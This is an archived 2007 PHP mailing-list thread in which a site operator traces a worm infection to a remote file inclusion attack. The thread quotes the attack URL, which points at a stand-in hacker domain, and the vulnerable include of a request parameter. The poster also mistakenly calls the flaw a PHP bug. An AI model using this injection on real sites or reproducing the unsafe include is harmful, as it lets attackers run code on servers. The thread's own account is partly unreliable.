Turn off all error reporting (in php.ini) so that the error isn't pushed to the screen. -----Original Message----- From: Seak, Teng-Fong [mailto:seak.tf@xxxxxxxxxxxx] Sent: Friday, March 02, 2007 12:16 PM To: php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx Subject: [PHP-WIN] Re: Question on virus/worms Robert Cummings wrote: > Did you bother to google any of them? I just punched PHP/BackDoor.gen > into Google and got a wealth of information. Yes, of course! But what I can see there aren't far from useless (cf what I write below). Stut wrote: > Seak, Teng-Fong wrote: >> PHP/Chaploit > http://vil.nai.com/vil/content/v_129568.htm > > [snipped] I know these already. The server is using McAfee. So I'm quite familiar with VIL of McAfee. But informations given by these pages aren't enough to let me know what to do and how those virus/worms got to get inside. >> Do they mean anything to anyone of you? Do you know how they've >> got inside the computer? Is there anything to do to prevent that? >> Are they known PHP virus/worms to PHP community? > Most likely means of them getting onto your machine is poorly written > scripts, over-reliance on scripts downloaded from the web and poor > server security. > > Hope that helps. No, not really :-( But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-f ile.txt? And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction: include("$page.php"); This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the "poorly written scripts" can help anything unless a totally rewrite! And there's no "poor server security" that I can see. I've installed PHP5 and the problem seems fixed. However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that? By the way, I know there're still a lot of servers out there still using PHP4. Is this vulnerability a known bug? At least, I'm not aware of that before! Regards, Seak ---------- * Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps You can download your free version. -- PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
